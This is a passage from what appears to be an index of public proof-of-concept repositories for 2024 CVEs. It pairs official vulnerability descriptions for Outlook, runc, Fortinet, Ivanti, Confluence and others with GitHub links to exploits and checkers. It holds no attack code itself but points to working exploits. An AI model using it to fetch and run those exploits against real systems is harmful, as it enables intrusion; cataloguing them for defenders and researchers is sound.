- [exploits-forsale/CVE-2024-21345](https://github.com/exploits-forsale/CVE-2024-21345)
- [FoxyProxys/CVE-2024-21345](https://github.com/FoxyProxys/CVE-2024-21345)

### CVE-2024-21378 (2024-02-13)

Microsoft Outlook Remote Code Execution Vulnerability

- [d0rb/CVE-2024-21378](https://github.com/d0rb/CVE-2024-21378)

### CVE-2024-21388 (2024-01-30)

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

- [d0rb/CVE-2024-21388](https://github.com/d0rb/CVE-2024-21388)

### CVE-2024-21412 (2024-02-13)

Internet Shortcut Files Security Feature Bypass Vulnerability

- [lsr00ter/CVE-2024-21412_Water-Hydra](https://github.com/lsr00ter/CVE-2024-21412_Water-Hydra)

### CVE-2024-21413 (2024-02-13)

Microsoft Outlook Remote Code Execution Vulnerability

- [duy-31/CVE-2024-21413](https://github.com/duy-31/CVE-2024-21413)
- [xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
- [r00tb1t/CVE-2024-21413-POC](https://github.com/r00tb1t/CVE-2024-21413-POC)
- [CMNatic/CVE-2024-21413](https://github.com/CMNatic/CVE-2024-21413)
- [MSeymenD/CVE-2024-21413](https://github.com/MSeymenD/CVE-2024-21413)
- [Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
- [ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
- [dshabani96/CVE-2024-21413](https://github.com/dshabani96/CVE-2024-21413)
- [X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit](https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit)
- [th3Hellion/CVE-2024-21413](https://github.com/th3Hellion/CVE-2024-21413)
- [ShubhamKanhere307/CVE-2024-21413](https://github.com/ShubhamKanhere307/CVE-2024-21413)
- [olebris/CVE-2024-21413](https://github.com/olebris/CVE-2024-21413)
- [DerZiad/CVE-2024-21413](https://github.com/DerZiad/CVE-2024-21413)
- [Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape](https://github.com/Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape)
- [ThemeHackers/CVE-2024-21413](https://github.com/ThemeHackers/CVE-2024-21413)

### CVE-2024-21514 (2024-06-22)

This affects versions of the package opencart/opencart from 0.0.0. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.

- [bigb0x/CVE-2024-21514](https://github.com/bigb0x/CVE-2024-21514)

### CVE-2024-21520 (2024-06-26)

Versions of the package djangorestframework before 3.15.2 are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with `<br>` tags.

- [ch4n3-yoon/CVE-2024-21520-Demo](https://github.com/ch4n3-yoon/CVE-2024-21520-Demo)

### CVE-2024-21626 (2024-01-31)

runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.

- [zpxlz/CVE-2024-21626-POC](https://github.com/zpxlz/CVE-2024-21626-POC)
- [NitroCao/CVE-2024-21626](https://github.com/NitroCao/CVE-2024-21626)
- [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC)
- [cdxiaodong/CVE-2024-21626](https://github.com/cdxiaodong/CVE-2024-21626)
- [zhangguanzhang/CVE-2024-21626](https://github.com/zhangguanzhang/CVE-2024-21626)
- [laysakura/CVE-2024-21626-demo](https://github.com/laysakura/CVE-2024-21626-demo)
- [V0WKeep3r/CVE-2024-21626-runcPOC](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC)
- [abian2/CVE-2024-21626](https://github.com/abian2/CVE-2024-21626)
- [Sk3pper/CVE-2024-21626](https://github.com/Sk3pper/CVE-2024-21626)
- [KubernetesBachelor/CVE-2024-21626](https://github.com/KubernetesBachelor/CVE-2024-21626)
- [dorser/cve-2024-21626](https://github.com/dorser/cve-2024-21626)
- [FlojBoj/CVE-2024-21626](https://github.com/FlojBoj/CVE-2024-21626)

### CVE-2024-21633 (2024-01-03)

Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names, which can be manipulated by an attacker to place files at a desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file to which the user has write access, and either the user name is known or the cwd is under the user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue.

- [0x33c0unt/CVE-2024-21633](https://github.com/0x33c0unt/CVE-2024-21633)

### CVE-2024-21644 (2024-01-08)

pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.

- [ltranquility/CVE-2024-21644-Poc](https://github.com/ltranquility/CVE-2024-21644-Poc)

### CVE-2024-21683 (2024-05-21)

This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server.

This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction.

Atlassian recommends that Confluence Data Center and Server customers upgrade to the latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html

You can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives.

This vulnerability was found internally.

- [r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server)
- [W01fh4cker/CVE-2024-21683-RCE](https://github.com/W01fh4cker/CVE-2024-21683-RCE)
- [absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server)
- [phucrio/CVE-2024-21683-RCE](https://github.com/phucrio/CVE-2024-21683-RCE)
- [xh4vm/CVE-2024-21683](https://github.com/xh4vm/CVE-2024-21683)

### CVE-2024-21689 (2024-08-20)

This High severity RCE (Remote Code Execution) vulnerability CVE-2024-21689 was introduced in versions 9.1.0, 9.2.0, 9.3.0, 9.4.0, 9.5.0, and 9.6.0 of Bamboo Data Center and Server.

This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.6, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.

Atlassian recommends that Bamboo Data Center and Server customers upgrade to the latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions:

- Bamboo Data Center and Server 9.2: Upgrade to a release greater than or equal to 9.2.17
- Bamboo Data Center and Server 9.6: Upgrade to a release greater than or equal to 9.6.5

See the release notes (https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html). You can download the latest version of Bamboo Data Center and Server from the download center (https://www.atlassian.com/software/bamboo/download-archives).

This vulnerability was reported via our Bug Bounty program.

- [salvadornakamura/CVE-2024-21689](https://github.com/salvadornakamura/CVE-2024-21689)

### CVE-2024-21733 (2024-01-19)

Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.

Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

- [LtmThink/CVE-2024-21733](https://github.com/LtmThink/CVE-2024-21733)

### CVE-2024-21754 (2024-06-11)

A use of password hash with insufficient computational effort vulnerability [CWE-916] affecting FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions, 2.0 all versions may allow a privileged attacker with super-admin profile and CLI access to decrypt the backup file.

- [CyberSecuritist/CVE-2024-21754-Forti-RCE](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE)

### CVE-2024-21762 (2024-02-09)

An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows an attacker to execute unauthorized code or commands via specifically crafted requests.

- [BishopFox/cve-2024-21762-check](https://github.com/BishopFox/cve-2024-21762-check)
- [cleverg0d/CVE-2024-21762-Checker](https://github.com/cleverg0d/CVE-2024-21762-Checker)
- [h4x0r-dz/CVE-2024-21762](https://github.com/h4x0r-dz/CVE-2024-21762)
- [r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check](https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check)
- [d0rb/CVE-2024-21762](https://github.com/d0rb/CVE-2024-21762)
- [lolminerxmrig/multicheck_CVE-2024-21762](https://github.com/lolminerxmrig/multicheck_CVE-2024-21762)
- [rdoix/cve-2024-21762-checker](https://github.com/rdoix/cve-2024-21762-checker)

### CVE-2024-21793 (2024-05-08)

An OData injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

- [FeatherStark/CVE-2024-21793](https://github.com/FeatherStark/CVE-2024-21793)

### CVE-2024-21887 (2024-01-12)

A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.

- [oways/ivanti-CVE-2024-21887](https://github.com/oways/ivanti-CVE-2024-21887)
- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887)
- [Chocapikk/CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21887)
- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887)
- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan)
- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped)
- [tucommenceapousser/CVE-2024-21887](https://github.com/tucommenceapousser/CVE-2024-21887)

### CVE-2024-21893 (2024-01-31)

A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.

- [h4x0r-dz/CVE-2024-21893.py](https://github.com/h4x0r-dz/CVE-2024-21893.py)
- [Chocapikk/CVE-2024-21893-to-CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887)

### CVE-2024-21978 (2024-08-05)

Improper input validation in SEV-SNP could allow a malicious hypervisor to read or overwrite guest memory potentially leading to data leakage or data corruption.

- [Freax13/cve-2024-21978-poc](https://github.com/Freax13/cve-2024-21978-poc)

### CVE-2024-21980 (2024-08-05)

Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to potentially overwrite a guest's memory or UMC seed resulting in loss of confidentiality and integrity.

- [Freax13/cve-2024-21980-poc](https://github.com/Freax13/cve-2024-21980-poc)

### CVE-2024-22002 (2024-06-18)

CORSAIR iCUE 5.9.105 with iCUE Murals on Windows allows unprivileged users to insert DLL files in the cuepkg-1.2.6 subdirectory of the installation directory.

- [0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002](https://github.com/0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002)

### CVE-2024-22024 (2024-02-13)

An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.

- [0dteam/CVE-2024-22024](https://github.com/0dteam/CVE-2024-22024)

### CVE-2024-22026 (2024-05-22)

A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance.

- [securekomodo/CVE-2024-22026](https://github.com/securekomodo/CVE-2024-22026)

### CVE-2024-22120 (2024-05-17)

Zabbix server can perform command execution for configured scripts. After a command is executed, an audit entry is added to the "Audit Log". Because the "clientip" field is not sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection.

- [W01fh4cker/CVE-2024-22120-RCE](https://github.com/W01fh4cker/CVE-2024-22120-RCE)
- [isPique/CVE-2024-22120-RCE-with-gopher](https://github.com/isPique/CVE-2024-22120-RCE-with-gopher)
- [g4nkd/CVE-2024-22120-RCE-with-gopher](https://github.com/g4nkd/CVE-2024-22120-RCE-with-gopher)

### CVE-2024-22145 (2024-05-17)

Improper Privilege Management vulnerability in InstaWP Team InstaWP Connect allows Privilege Escalation. This issue affects InstaWP Connect: from n/a through 0.1.0.8.

- [RandomRobbieBF/CVE-2024-22145](https://github.com/RandomRobbieBF/CVE-2024-22145)

### CVE-2024-22198 (2024-01-11)

Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings. The `Home > Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the API. This issue may lead to authenticated remote code execution, privilege escalation, and information disclosure. This vulnerability has been patched in version 2.0.0.beta.9.

- [xiw1ll/CVE-2024-22198_Checker](https://github.com/xiw1ll/CVE-2024-22198_Checker)

### CVE-2024-22243 (2024-02-23)

Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.

- [SeanPesce/CVE-2024-22243](https://github.com/SeanPesce/CVE-2024-22243)
- [shellfeel/CVE-2024-22243-CVE-2024-22234](https://github.com/shellfeel/CVE-2024-22243-CVE-2024-22234)

### CVE-2024-22263 (2024-06-19)

Spring Cloud Data Flow is a microservices-based Streaming and Batch data processing platform for Cloud Foundry and Kubernetes. The Skipper server has the ability to receive upload package requests. However, due to improper sanitization of the upload path, a malicious user who has access to the Skipper server API can use a crafted upload request to write an arbitrary file to any location on the file system, which may even compromise the server.

- [securelayer7/CVE-2024-22263_Scanner](https://github.com/securelayer7/CVE-2024-22263_Scanner)

### CVE-2024-22274 (2024-05-21)

The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system.

- [mbadanoiu/CVE-2024-22274](https://github.com/mbadanoiu/CVE-2024-22274)
- [ninhpn1337/CVE-2024-22274](https://github.com/ninhpn1337/CVE-2024-22274)
- [l0n3m4n/CVE-2024-22274-RCE](https://github.com/l0n3m4n/CVE-2024-22274-RCE)
- [Mustafa1986/CVE-2024-22274-RCE](https://github.com/Mustafa1986/CVE-2024-22274-RCE)

### CVE-2024-22275 (2024-05-21)

The vCenter Server contains a partial file read vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to partially read arbitrary files containing sensitive data.

- [mbadanoiu/CVE-2024-22275](https://github.com/mbadanoiu/CVE-2024-22275)

### CVE-2024-22369 (2024-02-20)

Deserialization of Untrusted Data vulnerability in Apache Camel SQL Component. This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.

Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1.

- [oscerd/CVE-2024-22369](https://github.com/oscerd/CVE-2024-22369)

### CVE-2024-22393 (2024-02-22)

Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1.

Pixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.

Users are recommended to upgrade to version 1.2.5, which fixes the issue.

- [omranisecurity/CVE-2024-22393](https://github.com/omranisecurity/CVE-2024-22393)

### CVE-2024-22411 (2024-01-16)

Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade.

- [tamaloa/avo-CVE-2024-22411](https://github.com/tamaloa/avo-CVE-2024-22411)

### CVE-2024-22416 (2024-01-17)

pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.

- [mindstorm38/ensimag-secu3a-cve-2024-22416](https://github.com/mindstorm38/ensimag-secu3a-cve-2024-22416)

### CVE-2024-22514 (2024-02-06)

An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file.

- [Orange-418/CVE-2024-22514-Remote-Code-Execution](https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution)

### CVE-2024-22515 (2024-02-06)

Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.

- [Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution](https://github.com/Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution)
- [Orange-418/CVE-2024-22515-File-Upload-Vulnerability](https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability)

### CVE-2024-22526 (2024-04-12)

Buffer Overflow vulnerability in bandisoft bandiview v7.0, allows local attackers to cause a denial of service (DoS) via exr image file.

- [200101WhoAmI/CVE-2024-22526](https://github.com/200101WhoAmI/CVE-2024-22526)

### CVE-2024-22532 (2024-02-28)

Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file.

- [pwndorei/CVE-2024-22532](https://github.com/pwndorei/CVE-2024-22532)

### CVE-2024-22534
- [austino2000/CVE-2024-22534](https://github.com/austino2000/CVE-2024-22534)

### CVE-2024-22640 (2024-04-19)

TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.

- [zunak/CVE-2024-22640](https://github.com/zunak/CVE-2024-22640)

### CVE-2024-22641 (-)

TCPDF version 6.6.5 and before is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file.

- [zunak/CVE-2024-22641](https://github.com/zunak/CVE-2024-22641)

### CVE-2024-22752 (2024-03-07)

Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory.

- [hacker625/CVE-2024-22752](https://github.com/hacker625/CVE-2024-22752)

### CVE-2024-22774 (-)

An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component.

- [Gray-0men/CVE-2024-22774](https://github.com/Gray-0men/CVE-2024-22774)

### CVE-2024-22853 (2024-02-06)

D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.

- [FaLLenSKiLL1/CVE-2024-22853](https://github.com/FaLLenSKiLL1/CVE-2024-22853)

### CVE-2024-22867
- [brandon-t-elliott/CVE-2024-22867](https://github.com/brandon-t-elliott/CVE-2024-22867)

### CVE-2024-22889 (2024-03-05)

Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request.

- [shenhav12/CVE-2024-22889-Plone-v6.0.9](https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9)

### CVE-2024-22890
- [BurakSevben/CVE-2024-22890](https://github.com/BurakSevben/CVE-2024-22890)

### CVE-2024-22891 (2024-03-01)

Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link.

- [EQSTLab/CVE-2024-22891](https://github.com/EQSTLab/CVE-2024-22891)

### CVE-2024-22894 (2024-01-30)

An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file.

- [Jaarden/CVE-2024-22894](https://github.com/Jaarden/CVE-2024-22894)

### CVE-2024-22899 (2024-02-02)

Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function.

- [Chocapikk/CVE-2024-22899-to-22903-ExploitChain](https://github.com/Chocapikk/CVE-2024-22899-to-22903-ExploitChain)

### CVE-2024-22909
- [BurakSevben/CVE-2024-22909](https://github.com/BurakSevben/CVE-2024-22909)

### CVE-2024-22922 (2024-01-25)

An issue in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via a crafted script to the login page in the POST/index.php.

- [keru6k/CVE-2024-22922](https://github.com/keru6k/CVE-2024-22922)

### CVE-2024-22939 (2024-02-01)

Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component.

- [NUDTTAN91/CVE-2024-22939](https://github.com/NUDTTAN91/CVE-2024-22939)

### CVE-2024-22983 (2024-02-28)

SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint.

- [keru6k/CVE-2024-22983](https://github.com/keru6k/CVE-2024-22983)

### CVE-2024-23002
- [xiaomaoxxx/CVE-2024-23002](https://github.com/xiaomaoxxx/CVE-2024-23002)

### CVE-2024-23108 (2024-02-05)

An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows an attacker to execute unauthorized code or commands via crafted API requests.

- [horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108)
- [hitem/CVE-2024-23108](https://github.com/hitem/CVE-2024-23108)

### CVE-2024-23112 (2024-03-12)

An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS version 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.1 through 7.0.13, 6.4.7 through 6.4.14, and FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14 SSL-VPN may allow an authenticated attacker to gain access to another user’s bookmark via URL manipulation.

- [zgimszhd61/CVE-2024-23112](https://github.com/zgimszhd61/CVE-2024-23112)

### CVE-2024-23113 (2024-02-15)

A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows an attacker to execute unauthorized code or commands via specially crafted packets.

- [OxLmahdi/cve-2024-23113](https://github.com/OxLmahdi/cve-2024-23113)
- [CheckCve2/CVE-2024-23113](https://github.com/CheckCve2/CVE-2024-23113)
- [HazeLook/CVE-2024-23113](https://github.com/HazeLook/CVE-2024-23113)
- [maybelookis/CVE-2024-23113](https://github.com/maybelookis/CVE-2024-23113)
- [p33d/CVE-2024-23113](https://github.com/p33d/CVE-2024-23113)
- [groshi/CVE-2024-23113-Private-POC](https://github.com/groshi/CVE-2024-23113-Private-POC)
- [Jaden1419/CVE-2024-23113](https://github.com/Jaden1419/CVE-2024-23113)
- [hatvix1/CVE-2024-23113](https://github.com/hatvix1/CVE-2024-23113)
- [zgimszhd61/CVE-2024-23113](https://github.com/zgimszhd61/CVE-2024-23113)
- [puckiestyle/CVE-2024-23113](https://github.com/puckiestyle/CVE-2024-23113)

### CVE-2024-23116 (2024-04-01)

Centreon updateLCARelation SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the updateLCARelation function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22296.

- [zgimszhd61/CVE-2024-23116](https://github.com/zgimszhd61/CVE-2024-23116)

### CVE-2024-23117 (2024-04-01)

Centreon updateContactServiceCommands SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the updateContactServiceCommands function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22297.

- [zgimszhd61/CVE-2024-23117](https://github.com/zgimszhd61/CVE-2024-23117)

### CVE-2024-23118 (2024-04-01)

Centreon updateContactHostCommands SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the updateContactHostCommands function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22298.

- [zgimszhd61/CVE-2024-23118](https://github.com/zgimszhd61/CVE-2024-23118)

### CVE-2024-23208 (2024-01-23)

The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.

- [hrtowii/CVE-2024-23208-test](https://github.com/hrtowii/CVE-2024-23208-test)

### CVE-2024-23334 (2024-01-29)

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.

- [ox1111/CVE-2024-23334](https://github.com/ox1111/CVE-2024-23334)
- [sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream](https://github.com/sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream)
- [z3rObyte/CVE-2024-23334-PoC](https://github.com/z3rObyte/CVE-2024-23334-PoC)
- [jhonnybonny/CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334)
- [brian-edgar-re/poc-cve-2024-23334](https://github.com/brian-edgar-re/poc-cve-2024-23334)
- [binaryninja/CVE-2024-23334](https://github.com/binaryninja/CVE-2024-23334)
- [s4botai/CVE-2024-23334-PoC](https://github.com/s4botai/CVE-2024-23334-PoC)
- [wizarddos/CVE-2024-23334](https://github.com/wizarddos/CVE-2024-23334)

### CVE-2024-23339 (2024-01-22)

hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties.

- [200101WhoAmI/CVE-2024-23339](https://github.com/200101WhoAmI/CVE-2024-23339)

### CVE-2024-23443 (2024-06-19)

A high-privileged user, allowed to create custom osquery packs, could affect the availability of Kibana by uploading a maliciously crafted osquery pack.

- [zhazhalove/osquery_cve-2024-23443](https://github.com/zhazhalove/osquery_cve-2024-23443)

### CVE-2024-23652 (2024-01-31)

BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding the use of BuildKit frontends from an untrusted source and not building an untrusted Dockerfile that uses the RUN --mount feature.

